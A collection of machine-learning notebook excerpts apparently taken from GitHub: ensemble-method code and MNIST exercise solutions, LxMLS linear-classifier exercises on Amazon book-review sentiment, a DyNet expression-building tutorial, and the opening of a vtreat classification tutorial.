mnist = fetch_openml('mnist_784', version=1)
mnist.target = mnist.target.astype(np.uint8)
rnd_clf = RandomForestClassifier(n_estimators=100, random_state=42)
rnd_clf.fit(mnist["data"], mnist["target"])
def plot_digit(data):
image = data.reshape(28, 28)
plt.imshow(image, cmap = mpl.cm.hot,
interpolation="nearest")
plt.axis("off")
plot_digit(rnd_clf.feature_importances_)
cbar = plt.colorbar(ticks=[rnd_clf.feature_importances_.min(), rnd_clf.feature_importances_.max()])
cbar.ax.set_yticklabels(['Not important', 'Very important'])
save_fig("mnist_feature_importance_plot")
plt.show()
```
# AdaBoost
```
from sklearn.ensemble import AdaBoostClassifier
ada_clf = AdaBoostClassifier(
DecisionTreeClassifier(max_depth=1), n_estimators=200,
algorithm="SAMME.R", learning_rate=0.5, random_state=42)
ada_clf.fit(X_train, y_train)
plot_decision_boundary(ada_clf, X, y)
m = len(X_train)
fix, axes = plt.subplots(ncols=2, figsize=(10,4), sharey=True)
for subplot, learning_rate in ((0, 1), (1, 0.5)):
sample_weights = np.ones(m)
plt.sca(axes[subplot])
for i in range(5):
svm_clf = SVC(kernel="rbf", C=0.05, gamma="scale", random_state=42)
svm_clf.fit(X_train, y_train, sample_weight=sample_weights)
y_pred = svm_clf.predict(X_train)
sample_weights[y_pred != y_train] *= (1 + learning_rate)
plot_decision_boundary(svm_clf, X, y, alpha=0.2)
plt.title("learning_rate = {}".format(learning_rate), fontsize=16)
if subplot == 0:
plt.text(-0.7, -0.65, "1", fontsize=14)
plt.text(-0.6, -0.10, "2", fontsize=14)
plt.text(-0.5, 0.10, "3", fontsize=14)
plt.text(-0.4, 0.55, "4", fontsize=14)
plt.text(-0.3, 0.90, "5", fontsize=14)
else:
plt.ylabel("")
save_fig("boosting_plot")
plt.show()
list(m for m in dir(ada_clf) if not m.startswith("_") and m.endswith("_"))
```
# Gradient Boosting
```
np.random.seed(42)
X = np.random.rand(100, 1) - 0.5
y = 3*X[:, 0]**2 + 0.05 * np.random.randn(100)
from sklearn.tree import DecisionTreeRegressor
tree_reg1 = DecisionTreeRegressor(max_depth=2, random_state=42)
tree_reg1.fit(X, y)
y2 = y - tree_reg1.predict(X)
tree_reg2 = DecisionTreeRegressor(max_depth=2, random_state=42)
tree_reg2.fit(X, y2)
y3 = y2 - tree_reg2.predict(X)
tree_reg3 = DecisionTreeRegressor(max_depth=2, random_state=42)
tree_reg3.fit(X, y3)
X_new = np.array([[0.8]])
y_pred = sum(tree.predict(X_new) for tree in (tree_reg1, tree_reg2, tree_reg3))
y_pred
def plot_predictions(regressors, X, y, axes, label=None, style="r-", data_style="b.", data_label=None):
x1 = np.linspace(axes[0], axes[1], 500)
y_pred = sum(regressor.predict(x1.reshape(-1, 1)) for regressor in regressors)
plt.plot(X[:, 0], y, data_style, label=data_label)
plt.plot(x1, y_pred, style, linewidth=2, label=label)
if label or data_label:
plt.legend(loc="upper center", fontsize=16)
plt.axis(axes)
plt.figure(figsize=(11,11))
plt.subplot(321)
plot_predictions([tree_reg1], X, y, axes=[-0.5, 0.5, -0.1, 0.8], label="$h_1(x_1)$", style="g-", data_label="Training set")
plt.ylabel("$y$", fontsize=16, rotation=0)
plt.title("Residuals and tree predictions", fontsize=16)
plt.subplot(322)
plot_predictions([tree_reg1], X, y, axes=[-0.5, 0.5, -0.1, 0.8], label="$h(x_1) = h_1(x_1)$", data_label="Training set")
plt.ylabel("$y$", fontsize=16, rotation=0)
plt.title("Ensemble predictions", fontsize=16)
plt.subplot(323)
plot_predictions([tree_reg2], X, y2, axes=[-0.5, 0.5, -0.5, 0.5], label="$h_2(x_1)$", style="g-", data_style="k+", data_label="Residuals")
plt.ylabel("$y - h_1(x_1)$", fontsize=16)
plt.subplot(324)
plot_predictions([tree_reg1, tree_reg2], X, y, axes=[-0.5, 0.5, -0.1, 0.8], label="$h(x_1) = h_1(x_1) + h_2(x_1)$")
plt.ylabel("$y$", fontsize=16, rotation=0)
plt.subplot(325)
plot_predictions([tree_reg3], X, y3, axes=[-0.5, 0.5, -0.5, 0.5], label="$h_3(x_1)$", style="g-", data_style="k+")
plt.ylabel("$y - h_1(x_1) - h_2(x_1)$", fontsize=16)
plt.xlabel("$x_1$", fontsize=16)
plt.subplot(326)
plot_predictions([tree_reg1, tree_reg2, tree_reg3], X, y, axes=[-0.5, 0.5, -0.1, 0.8], label="$h(x_1) = h_1(x_1) + h_2(x_1) + h_3(x_1)$")
plt.xlabel("$x_1$", fontsize=16)
plt.ylabel("$y$", fontsize=16, rotation=0)
save_fig("gradient_boosting_plot")
plt.show()
from sklearn.ensemble import GradientBoostingRegressor
gbrt = GradientBoostingRegressor(max_depth=2, n_estimators=3, learning_rate=1.0, random_state=42)
gbrt.fit(X, y)
gbrt_slow = GradientBoostingRegressor(max_depth=2, n_estimators=200, learning_rate=0.1, random_state=42)
gbrt_slow.fit(X, y)
fix, axes = plt.subplots(ncols=2, figsize=(10,4), sharey=True)
plt.sca(axes[0])
plot_predictions([gbrt], X, y, axes=[-0.5, 0.5, -0.1, 0.8], label="Ensemble predictions")
plt.title("learning_rate={}, n_estimators={}".format(gbrt.learning_rate, gbrt.n_estimators), fontsize=14)
plt.xlabel("$x_1$", fontsize=16)
plt.ylabel("$y$", fontsize=16, rotation=0)
plt.sca(axes[1])
plot_predictions([gbrt_slow], X, y, axes=[-0.5, 0.5, -0.1, 0.8])
plt.title("learning_rate={}, n_estimators={}".format(gbrt_slow.learning_rate, gbrt_slow.n_estimators), fontsize=14)
plt.xlabel("$x_1$", fontsize=16)
save_fig("gbrt_learning_rate_plot")
plt.show()
```
## Gradient Boosting with Early stopping
```
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
X_train, X_val, y_train, y_val = train_test_split(X, y, random_state=49)
gbrt = GradientBoostingRegressor(max_depth=2, n_estimators=120, random_state=42)
gbrt.fit(X_train, y_train)
errors = [mean_squared_error(y_val, y_pred)
for y_pred in gbrt.staged_predict(X_val)]
bst_n_estimators = np.argmin(errors) + 1
gbrt_best = GradientBoostingRegressor(max_depth=2, n_estimators=bst_n_estimators, random_state=42)
gbrt_best.fit(X_train, y_train)
min_error = np.min(errors)
plt.figure(figsize=(10, 4))
plt.subplot(121)
plt.plot(errors, "b.-")
plt.plot([bst_n_estimators, bst_n_estimators], [0, min_error], "k--")
plt.plot([0, 120], [min_error, min_error], "k--")
plt.plot(bst_n_estimators, min_error, "ko")
plt.text(bst_n_estimators, min_error*1.2, "Minimum", ha="center", fontsize=14)
plt.axis([0, 120, 0, 0.01])
plt.xlabel("Number of trees")
plt.ylabel("Error", fontsize=16)
plt.title("Validation error", fontsize=14)
plt.subplot(122)
plot_predictions([gbrt_best], X, y, axes=[-0.5, 0.5, -0.1, 0.8])
plt.title("Best model (%d trees)" % bst_n_estimators, fontsize=14)
plt.ylabel("$y$", fontsize=16, rotation=0)
plt.xlabel("$x_1$", fontsize=16)
save_fig("early_stopping_gbrt_plot")
plt.show()
gbrt = GradientBoostingRegressor(max_depth=2, warm_start=True, random_state=42)
min_val_error = float("inf")
error_going_up = 0
for n_estimators in range(1, 120):
gbrt.n_estimators = n_estimators
gbrt.fit(X_train, y_train)
y_pred = gbrt.predict(X_val)
val_error = mean_squared_error(y_val, y_pred)
if val_error < min_val_error:
min_val_error = val_error
error_going_up = 0
else:
error_going_up += 1
if error_going_up == 5:
break # early stopping
print(gbrt.n_estimators)
print("Minimum validation MSE:", min_val_error)
```
## Using XGBoost
```
try:
import xgboost
except ImportError as ex:
print("Error: the xgboost library is not installed.")
xgboost = None
if xgboost is not None: # not shown in the book
xgb_reg = xgboost.XGBRegressor(random_state=42)
xgb_reg.fit(X_train, y_train)
y_pred = xgb_reg.predict(X_val)
val_error = mean_squared_error(y_val, y_pred) # Not shown
print("Validation MSE:", val_error) # Not shown
if xgboost is not None: # not shown in the book
xgb_reg.fit(X_train, y_train,
eval_set=[(X_val, y_val)], early_stopping_rounds=2)
y_pred = xgb_reg.predict(X_val)
val_error = mean_squared_error(y_val, y_pred) # Not shown
print("Validation MSE:", val_error) # Not shown
%timeit xgboost.XGBRegressor().fit(X_train, y_train) if xgboost is not None else None
%timeit GradientBoostingRegressor().fit(X_train, y_train)
```
# Exercise solutions
## 1. to 7.
See Appendix A.
## 8. Voting Classifier
Exercise: _Load the MNIST data and split it into a training set, a validation set, and a test set (e.g., use 50,000 instances for training, 10,000 for validation, and 10,000 for testing)._
The MNIST dataset was loaded earlier.
```
from sklearn.model_selection import train_test_split
X_train_val, X_test, y_train_val, y_test = train_test_split(
mnist.data, mnist.target, test_size=10000, random_state=42)
X_train, X_val, y_train, y_val = train_test_split(
X_train_val, y_train_val, test_size=10000, random_state=42)
```
Exercise: _Then train various classifiers, such as a Random Forest classifier, an Extra-Trees classifier, and an SVM._
```
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
from sklearn.svm import LinearSVC
from sklearn.neural_network import MLPClassifier
random_forest_clf = RandomForestClassifier(n_estimators=100, random_state=42)
extra_trees_clf = ExtraTreesClassifier(n_estimators=100, random_state=42)
svm_clf = LinearSVC(random_state=42)
mlp_clf = MLPClassifier(random_state=42)
estimators = [random_forest_clf, extra_trees_clf, svm_clf, mlp_clf]
for estimator in estimators:
print("Training the", estimator)
estimator.fit(X_train, y_train)
[estimator.score(X_val, y_val) for estimator in estimators]
```
The linear SVM is far outperformed by the other classifiers. However, let's keep it for now since it may improve the voting classifier's performance.
Exercise: _Next, try to combine them into an ensemble that outperforms them all on the validation set, using a soft or hard voting classifier._
```
from sklearn.ensemble import VotingClassifier
named_estimators = [
("random_forest_clf", random_forest_clf),
("extra_trees_clf", extra_trees_clf),
("svm_clf", svm_clf),
("mlp_clf", mlp_clf),
]
voting_clf = VotingClassifier(named_estimators)
voting_clf.fit(X_train, y_train)
voting_clf.score(X_val, y_val)
[estimator.score(X_val, y_val) for estimator in voting_clf.estimators_]
```
Let's remove the SVM to see if performance improves. It is possible to remove an estimator by setting it to `None` using `set_params()` like this:
```
voting_clf.set_params(svm_clf=None)
```
This updated the list of estimators:
```
voting_clf.estimators
```
However, it did not update the list of _trained_ estimators:
```
voting_clf.estimators_
```
So we can either fit the `VotingClassifier` again, or just remove the SVM from the list of trained estimators:
```
del voting_clf.estimators_[2]
```
Now let's evaluate the `VotingClassifier` again:
```
voting_clf.score(X_val, y_val)
```
A bit better! The SVM was hurting performance. Now let's try using a soft voting classifier. We do not actually need to retrain the classifier, we can just set `voting` to `"soft"`:
```
voting_clf.voting = "soft"
voting_clf.score(X_val, y_val)
```
Nope, hard voting wins in this case.
_Once you have found one, try it on the test set. How much better does it perform compared to the individual classifiers?_
```
voting_clf.voting = "hard"
voting_clf.score(X_test, y_test)
[estimator.score(X_test, y_test) for estimator in voting_clf.estimators_]
```
The voting classifier only very slightly reduced the error rate of the best model in this case.
## 9. Stacking Ensemble
Exercise: _Run the individual classifiers from the previous exercise to make predictions on the validation set, and create a new training set with the resulting predictions: each training instance is a vector containing the set of predictions from all your classifiers for an image, and the target is the image's class. Train a classifier on this new training set._
```
X_val_predictions = np.empty((len(X_val), len(estimators)), dtype=np.float32)
for index, estimator in enumerate(estimators):
X_val_predictions[:, index] = estimator.predict(X_val)
X_val_predictions
rnd_forest_blender = RandomForestClassifier(n_estimators=200, oob_score=True, random_state=42)
rnd_forest_blender.fit(X_val_predictions, y_val)
rnd_forest_blender.oob_score_
```
You could fine-tune this blender or try other types of blenders (e.g., an `MLPClassifier`), then select the best one using cross-validation, as always.
Exercise: _Congratulations, you have just trained a blender, and together with the classifiers they form a stacking ensemble! Now let's evaluate the ensemble on the test set. For each image in the test set, make predictions with all your classifiers, then feed the predictions to the blender to get the ensemble's predictions. How does it compare to the voting classifier you trained earlier?_
```
X_test_predictions = np.empty((len(X_test), len(estimators)), dtype=np.float32)
for index, estimator in enumerate(estimators):
X_test_predictions[:, index] = estimator.predict(X_test)
y_pred = rnd_forest_blender.predict(X_test_predictions)
from sklearn.metrics import accuracy_score
accuracy_score(y_test, y_pred)
```
This stacking ensemble does not perform as well as the voting classifier we trained earlier, it's not quite as good as the best individual classifier.
|
github_jupyter
|
## Exercise 1.1
In this exercise we will use the Amazon sentiment analysis data (Blitzer et al., 2007), where the goal is toclassify text documents as expressing apositiveornegativesentiment (i.e., a classification problem with two classes).We are going to focus on book reviews. To load the data, type:
```
import lxmls.readers.sentiment_reader as srs
scr = srs.SentimentCorpus("books")
import lxmls.classifiers.multinomial_naive_bayes as mnbb
mnb = mnbb.MultinomialNaiveBayes()
params_nb_sc = mnb.train(scr.train_X,scr.train_y)
y_pred_train = mnb.test(scr.train_X,params_nb_sc)
acc_train = mnb.evaluate(scr.train_y, y_pred_train)
y_pred_test = mnb.test(scr.test_X,params_nb_sc)
acc_test = mnb.evaluate(scr.test_y, y_pred_test)
print("Multinomial Naive Bayes Amazon Sentiment Accuracy train: %f test: %f"%(acc_train,acc_test))
```
## Exercise 1.2
We provide an implementation of the perceptron algorithm in the classPerceptron(fileperceptron.py).
```
# 1. Run the following commands to generate a simple dataset
import lxmls.readers.simple_data_set as sds
sd = sds.SimpleDataSet(nr_examples=100, g1 = [[-1,-1],1], g2 = [[1,1],1], balance=0.5, split=[0.5,0,0.5])
# 2. Run the perceptron algorithm on the simple dataset previously generated and report its train and test set accuracy:
import lxmls.classifiers.perceptron as percc
perc = percc.Perceptron()
params_perc_sd = perc.train(sd.train_X,sd.train_y)
y_pred_train = perc.test(sd.train_X,params_perc_sd)
acc_train = perc.evaluate(sd.train_y, y_pred_train)
y_pred_test = perc.test(sd.test_X,params_perc_sd)
acc_test = perc.evaluate(sd.test_y, y_pred_test)
print("Perceptron Simple Dataset Accuracy train: %f test: %f"%(acc_train, acc_test))
# 3. Plot the decision boundary found:
fig,axis = sd.plot_data()
fig,axis = sd.add_line(fig,axis,params_perc_sd,"Perceptron","blue")
# 4. Run the perceptron algorithm on the Amazon dataset.
import lxmls.classifiers.perceptron as percc
perc = percc.Perceptron()
params_perc_sc = perc.train(scr.train_X,scr.train_y)
y_pred_train = perc.test(scr.train_X,params_perc_sc)
acc_train = perc.evaluate(scr.train_y, y_pred_train)
y_pred_test = perc.test(scr.test_X,params_perc_sc)
acc_test = perc.evaluate(scr.test_y, y_pred_test)
print("Perceptron Amazon Sentiment Accuracy train: %f test: %f"%(acc_train,acc_test))
```
## Exercise 1.3
We provide an implementation of the MIRA algorithm. Compare it with the perceptron for various values
```
import lxmls.classifiers.mira as mirac
mira = mirac.Mira()
mira.regularizer = 1.0 # This is lambda
params_mira_sd = mira.train(sd.train_X,sd.train_y)
y_pred_train = mira.test(sd.train_X,params_mira_sd)
acc_train = mira.evaluate(sd.train_y, y_pred_train)
y_pred_test = mira.test(sd.test_X,params_mira_sd)
acc_test = mira.evaluate(sd.test_y, y_pred_test)
print("Mira Simple Dataset Accuracy train: %f test: %f"%(acc_train, acc_test))
fig, axis = sd.add_line(fig, axis, params_mira_sd, "Mira","green")
fig
import lxmls.classifiers.mira as mirac
mira = mirac.Mira()
mira.regularizer = 1.0 # This is lambda
params_mira_sc = mira.train(scr.train_X,scr.train_y)
y_pred_train = mira.test(scr.train_X,params_mira_sc)
acc_train = mira.evaluate(scr.train_y, y_pred_train)
y_pred_test = mira.test(scr.test_X,params_mira_sc)
acc_test = mira.evaluate(scr.test_y, y_pred_test)
print("Mira Amazon Sentiment Accuracy train: %f test: %f"%(acc_train,acc_test))
```
## Exercise 1.4
We provide an implementation of the L-BFGS algorithm for training maximum entropy models in the classMaxEntbatch, as well as an implementation of the SGD algorithm in the classMaxEntonline.
```
# 1. Train a maximum entropy model using L-BFGS on the Simple data set (try different values ofλ).
# Compare theresults with the previous methods.
# Plot the decision boundary.
import lxmls.classifiers.max_ent_batch as mebc
me_lbfgs = mebc.MaxEntBatch()
me_lbfgs.regularizer = 1.0
params_meb_sd = me_lbfgs.train(sd.train_X,sd.train_y)
y_pred_train = me_lbfgs.test(sd.train_X,params_meb_sd)
acc_train = me_lbfgs.evaluate(sd.train_y, y_pred_train)
y_pred_test = me_lbfgs.test(sd.test_X,params_meb_sd)
acc_test = me_lbfgs.evaluate(sd.test_y, y_pred_test)
print(
"Max-Ent batch Simple Dataset Accuracy train: %f test: %f" %
(acc_train,acc_test)
)
fig, axis = sd.add_line(fig, axis, params_meb_sd, "Max-Ent-Batch","orange")
fig
# 2. Train a maximum entropy model using L-BFGS,
# on the Amazon dataset (try different values ofλ) and reporttraining and test set accuracy.
# What do you observe?
params_meb_sc = me_lbfgs.train(scr.train_X,scr.train_y)
y_pred_train = me_lbfgs.test(scr.train_X,params_meb_sc)
acc_train = me_lbfgs.evaluate(scr.train_y, y_pred_train)
y_pred_test = me_lbfgs.test(scr.test_X,params_meb_sc)
acc_test = me_lbfgs.evaluate(scr.test_y, y_pred_test)
print(
"Max-Ent Batch Amazon Sentiment Accuracy train: %f test: %f" %
(acc_train, acc_test)
)
# 3. Now, fixλ=1.0and train with SGD (you might try to adjust the initial step).
# Compare the objective valuesobtained during training with those obtained with L-BFGS.
# What do you observe?
import lxmls.classifiers.max_ent_online as meoc
me_sgd = meoc.MaxEntOnline()
me_sgd.regularizer = 1.0
params_meo_sc = me_sgd.train(scr.train_X,scr.train_y)
y_pred_train = me_sgd.test(scr.train_X,params_meo_sc)
acc_train = me_sgd.evaluate(scr.train_y, y_pred_train)
y_pred_test = me_sgd.test(scr.test_X,params_meo_sc)
acc_test = me_sgd.evaluate(scr.test_y, y_pred_test)
print(
"Max-Ent Online Amazon Sentiment Accuracy train: %f test: %f" %
(acc_train, acc_test)
)
```
## Exercise 1.5
Run the SVM primal algorithm. Then, repeat the MaxEnt exercise now using SVMs, for several values ofλ:
```
import lxmls.classifiers.svm as svmc
svm = svmc.SVM()
svm.regularizer = 1.0 # This is lambda
params_svm_sd = svm.train(sd.train_X,sd.train_y)
y_pred_train = svm.test(sd.train_X,params_svm_sd)
acc_train = svm.evaluate(sd.train_y, y_pred_train)
y_pred_test = svm.test(sd.test_X,params_svm_sd)
acc_test = svm.evaluate(sd.test_y, y_pred_test)
print("SVM Online Simple Dataset Accuracy train: {} test: {}".format(acc_train,acc_test))
fig, axis = sd.add_line(fig, axis, params_svm_sd, "SVM", "yellow")
fig
params_svm_sc = svm.train(scr.train_X,scr.train_y)
y_pred_train = svm.test(scr.train_X,params_svm_sc)
acc_train = svm.evaluate(scr.train_y, y_pred_train)
y_pred_test = svm.test(scr.test_X,params_svm_sc)
acc_test = svm.evaluate(scr.test_y, y_pred_test)
print("SVM Online Amazon Sentiment Accuracy train: {} test: {}".format(acc_train,acc_test))
```
## Exercise 1.6
Using the simple dataset run the different algorithms varying some characteristics of the data: like the number of points, variance (hence separability), class balance. Use function run_all_classifiers in file lab-s/run_all_classifiers.py which receives a dataset and plots all decisions boundaries and accuracies. What can you say about the methods when the amount of data increases? What about when the classes become too unbalanced?
```
from lxmls.run_all_classifiers import run_all_classifiers
run_all_classifiers(sd)
```
|
github_jupyter
|
## API tutorial
### Expression building
(note: may have old API in some cases)
```
import dynet as dy
## ==== Create a new computation graph
# (it is a singleton, we have one at each stage.
# dy.renew_cg() clears the current one and starts anew)
dy.renew_cg()
## ==== Creating Expressions from user input / constants.
x = dy.scalarInput(value)
v = dy.vecInput(dimension)
v.set([1,2,3])
z = dy.matInput(dim1, dim2)
# for example:
z1 = dy.matInput(2, 2)
z1.set([1,2,3,4]) # Column major
# Or directly from a numpy array
z1 = inputTensor([[1,2],[3,4]]) # Row major
## ==== We can take the value of an expression.
# For complex expressions, this will run forward propagation.
print z.value()
print z.npvalue() # as numpy array
print v.vec_value() # as vector, if vector
print x.scalar_value() # as scalar, if scalar
print x.value() # choose the correct one
## ==== Parameters
# Parameters are things we tune during training.
# Usually a matrix or a vector.
# First we create a parameter collection and add the parameters to it.
m = ParameterCollection()
pW = m.add_parameters((8,8)) # an 8x8 matrix
pb = m.add_parameters(8)
# then we create an Expression out of the parameter collection's parameters
W = dy.parameter(pW)
b = dy.parameter(pb)
## ===== Lookup parameters
# Similar to parameters, but are representing a "lookup table"
# that maps numbers to vectors.
# These are used for embedding matrices.
# for example, this will have VOCAB_SIZE rows, each of DIM dimensions.
lp = m.add_lookup_parameters((VOCAB_SIZE, DIM))
# lookup parameters can be initialized from an existing array, i.e:
# m["lookup"].init_from_array(wv)
e5 = dy.lookup(lp, 5) # create an Expression from row 5.
e5 = lp[5] # same
e5c = dy.lookup(lp, 5, update=False) # as before, but don't update when optimizing.
e5 = dy.lookup_batch(lp, [4, 5]) # create a batched Expression from rows 4 and 5.
e5 = lp.batch([4, 5]) # same
e5.set(9) # now the e5 expression contains row 9
e5c.set(9) # ditto
## ===== Combine expression into complex expressions.
# Math
e = e1 + e2
e = e1 * e2 # for vectors/matrices: matrix multiplication (like e1.dot(e2) in numpy)
e = e1 - e2
e = -e1
e = dy.dot_product(e1, e2)
e = dy.cmult(e1, e2) # component-wise multiply (like e1*e2 in numpy)
e = dy.cdiv(e1, e2) # component-wise divide
e = dy.colwise_add(e1, e2) # column-wise addition
# Matrix Shapes
e = dy.reshape(e1, new_dimension)
e = dy.transpose(e1)
# Per-element unary functions.
e = dy.tanh(e1)
e = dy.exp(e1)
e = dy.log(e1)
e = dy.logistic(e1) # Sigmoid(x)
e = dy.rectify(e1) # Relu (= max(x,0))
e = dy.softsign(e1) # x/(1+|x|)
# softmaxes
e = dy.softmax(e1)
e = dy.log_softmax(e1, restrict=[]) # restrict is a set of indices.
# if not empty, only entries in restrict are part
# of softmax computation, others get 0.
e = dy.sum_cols(e1)
# Picking values from vector expressions
e = dy.pick(e1, k) # k is unsigned integer, e1 is vector. return e1[k]
e = e1[k] # same
e = dy.pickrange(e1, k, v) # like python's e1[k:v] for lists. e1 is an Expression, k,v integers.
e = e1[k:v] # same
e = dy.pickneglogsoftmax(e1, k) # k is unsigned integer. equiv to: (pick(-log(dy.softmax(e1)), k))
# Neural net stuff
dy.noise(e1, stddev) # add a noise to each element from a gausian with standard-dev = stddev
dy.dropout(e1, p) # apply dropout with probability p
# functions over lists of expressions
e = dy.esum([e1, e2, ...]) # sum
e = dy.average([e1, e2, ...]) # average
e = dy.concatenate_cols([e1, e2, ...]) # e1, e2,.. are column vectors. return a matrix. (sim to np.hstack([e1,e2,...])
e = dy.concatenate([e1, e2, ...]) # concatenate
e = dy.affine_transform([e0,e1,e2, ...]) # e = e0 + ((e1*e2) + (e3*e4) ...)
## Loss functions
e = dy.squared_distance(e1, e2)
e = dy.l1_distance(e1, e2)
e = dy.huber_distance(e1, e2, c=1.345)
# e1 must be a scalar that is a value between 0 and 1
# e2 (ty) must be a scalar that is a value between 0 and 1
# e = ty * log(e1) + (1 - ty) * log(1 - e1)
e = dy.binary_log_loss(e1, e2)
# e1 is row vector or scalar
# e2 is row vector or scalar
# m is number
# e = max(0, m - (e1 - e2))
e = dy.pairwise_rank_loss(e1, e2, m=1.0)
# Convolutions
# e1 \in R^{d x s} (input)
# e2 \in R^{d x m} (filter)
e = dy.conv1d_narrow(e1, e2) # e = e1 *conv e2
e = dy.conv1d_wide(e1, e2) # e = e1 *conv e2
e = dy.filter1d_narrow(e1, e2) # e = e1 *filter e2
e = dy.kmax_pooling(e1, k) # kmax-pooling operation (Kalchbrenner et al 2014)
e = dy.kmh_ngram(e1, k) #
e = dy.fold_rows(e1, nrows=2) #
```
### Recipe
```
import dynet as dy
# create parameter collection
m = dy.ParameterCollection()
# add parameters to parameter collection
pW = m.add_parameters((10,30))
pB = m.add_parameters(10)
lookup = m.add_lookup_parameters((500, 10))
print "added"
# create trainer
trainer = dy.SimpleSGDTrainer(m)
# Regularization is set via the --dynet-l2 commandline flag.
# Learning rate parameters can be passed to the trainer:
# alpha = 0.1 # learning rate
# trainer = dy.SimpleSGDTrainer(m, e0=alpha)
# function for graph creation
def create_network_return_loss(inputs, expected_output):
"""
inputs is a list of numbers
"""
dy.renew_cg()
W = dy.parameter(pW) # from parameters to expressions
b = dy.parameter(pB)
emb_vectors = [lookup[i] for i in inputs]
net_input = dy.concatenate(emb_vectors)
net_output = dy.softmax( (W*net_input) + b)
loss = -dy.log(dy.pick(net_output, expected_output))
return loss
# function for prediction
def create_network_return_best(inputs):
"""
inputs is a list of numbers
"""
dy.renew_cg()
W = dy.parameter(pW)
b = dy.parameter(pB)
emb_vectors = [lookup[i] for i in inputs]
net_input = dy.concatenate(emb_vectors)
net_output = dy.softmax( (W*net_input) + b)
return np.argmax(net_output.npvalue())
# train network
for epoch in xrange(5):
for inp,lbl in ( ([1,2,3],1), ([3,2,4],2) ):
print inp, lbl
loss = create_network_return_loss(inp, lbl)
print loss.value() # need to run loss.value() for the forward prop
loss.backward()
trainer.update()
print create_network_return_best([1,2,3])
```
### Recipe (using classes)
```
import dynet as dy
# create parameter collection
m = dy.ParameterCollection()
# create a class encapsulating the network
class OurNetwork(object):
# The init method adds parameters to the parameter collection.
def __init__(self, pc):
self.pW = pc.add_parameters((10,30))
self.pB = pc.add_parameters(10)
self.lookup = pc.add_lookup_parameters((500,10))
# the __call__ method applies the network to an input
def __call__(self, inputs):
W = dy.parameter(self.pW)
b = dy.parameter(self.pB)
lookup = self.lookup
emb_vectors = [lookup[i] for i in inputs]
net_input = dy.concatenate(emb_vectors)
net_output = dy.softmax( (W*net_input) + b)
return net_output
def create_network_return_loss(self, inputs, expected_output):
dy.renew_cg()
out = self(inputs)
loss = -dy.log(dy.pick(out, expected_output))
return loss
def create_network_return_best(self, inputs):
dy.renew_cg()
out = self(inputs)
return np.argmax(out.npvalue())
# create network
network = OurNetwork(m)
# create trainer
trainer = dy.SimpleSGDTrainer(m)
# train network
for epoch in xrange(5):
for inp,lbl in ( ([1,2,3],1), ([3,2,4],2) ):
print inp, lbl
loss = network.create_network_return_loss(inp, lbl)
print loss.value() # need to run loss.value() for the forward prop
loss.backward()
trainer.update()
print
print network.create_network_return_best([1,2,3])
```
### or, alternatively, have the training outside of the network class
```
# create network
network = OurNetwork(m)
# create trainer
trainer = dy.SimpleSGDTrainer(m)
# train network
for epoch in xrange(5):
for inp,lbl in ( ([1,2,3],1), ([3,2,4],2) ):
print inp, lbl
dy.renew_cg()
out = network(inp)
loss = -dy.log(dy.pick(out, lbl))
print loss.value() # need to run loss.value() for the forward prop
loss.backward()
trainer.update()
print
print np.argmax(network([1,2,3]).npvalue())
```
|
github_jupyter
|
# Using [vtreat](https://github.com/WinVector/pyvtreat) with Classification Problems
Nina Zumel and John Mount
November 2019
Note: this is a description of the [`Python` version of `vtreat`](https://github.com/WinVector/pyvtreat), the same example for the [`R` version of `vtreat`](https://github.com/WinVector/vtreat) can be found [here](https://github.com/WinVector/vtreat/blob/master/Examples/Classification/Classification.md).
## Preliminaries
Load modules/packages.
```
import pkg_resources
import pandas
import numpy
import numpy.random
import seaborn
import matplotlib.pyplot as plt
import vtreat
import vtreat.util
import wvpy.util
numpy.random.seed(2019)
```
Generate example data.
* `y` is a noisy sinusoidal function of the variable `x`
* `yc` is the output to be predicted: : whether `y` is > 0.5.
* Input `xc` is a categorical variable that represents a discretization of `y`, along some `NaN`s
* Input `x2` is a pure noise variable with no relationship to the output
```
def make_data(nrows):
d = pandas.DataFrame({'x': 5*numpy.random.normal(size=nrows)})
d['y'] = numpy.sin(d['x']) + 0.1*numpy.random.normal(size=nrows)
d.loc[numpy.arange(3, 10), 'x'] = numpy.nan # introduce a nan level
d['xc'] = ['level_' + str(5*numpy.round(yi/5, 1)) for yi in d['y']]
d['x2'] = numpy.random.normal(size=nrows)
d.loc[d['xc']=='level_-1.0', 'xc'] = numpy.nan # introduce a nan level
d['yc'] = d['y']>0.5
return d
d = make_data(500)
d.head()
outcome_name = 'yc' # outcome variable / column
outcome_target = True # value we consider positive
```
### Some quick data exploration
Check how many levels `xc` has, and their distribution (including `NaN`)
```
d['xc'].unique()
d['xc'].value_counts(dropna=False)
```
Find the prevalence of `yc == True` (our chosen notion of "positive").
```
numpy.mean(d[outcome_name] == outcome_target)
```
Plot of `yc` versus `x`.
```
seaborn.lineplot(x='x', y='yc', data=d)
```
## Build a transform appropriate for classification problems.
Now that we have the data, we want to treat it prior to modeling: we want training data where all the input variables are numeric and have no missing values or `NaN`s.
First create the data treatment transform object, in this case a treatment for a binomial classification problem.
```
transform = vtreat.BinomialOutcomeTreatment(
outcome_name=outcome_name, # outcome variable
outcome_target=outcome_target, # outcome of interest
cols_to_copy=['y'], # columns to "carry along" but not treat as input variables
)
```
Use the training data `d` to fit the transform and the return a treated training set: completely numeric, with no missing values.
Note that for the training data `d`: `transform.fit_transform()` is **not** the same as `transform.fit().transform()`; the second call can lead to nested model bias in some situations, and is **not** recommended.
For other, later data, not seen during transform design `transform.transform(o)` is an appropriate step.
```
d_prepared = transform.fit_transform(d, d['yc'])
```
Now examine the score frame, which gives information about each new variable, including its type, which original variable it is derived from, its (cross-validated) correlation with the outcome, and its (cross-validated) significance as a one-variable linear model for the outcome.
```
transform.score_frame_
```
Note that the variable `xc` has been converted to multiple variables:
* an indicator variable for each possible level (`xc_lev_level_*`)
* the value of a (cross-validated) one-variable model for `yc` as a function of `xc` (`xc_logit_code`)
* a variable that returns how prevalent this particular value of `xc` is in the training data (`xc_prevalence_code`)
* a variable indicating when `xc` was `NaN` in the original data (`xc_is_bad`, `x_is_bad`)
Any or all of these new variables are available for downstream modeling. `x` doesn't show as exciting a significance as `xc`, as we are only checking linear relations, and `x` is related to `y` in a very non-linear way.
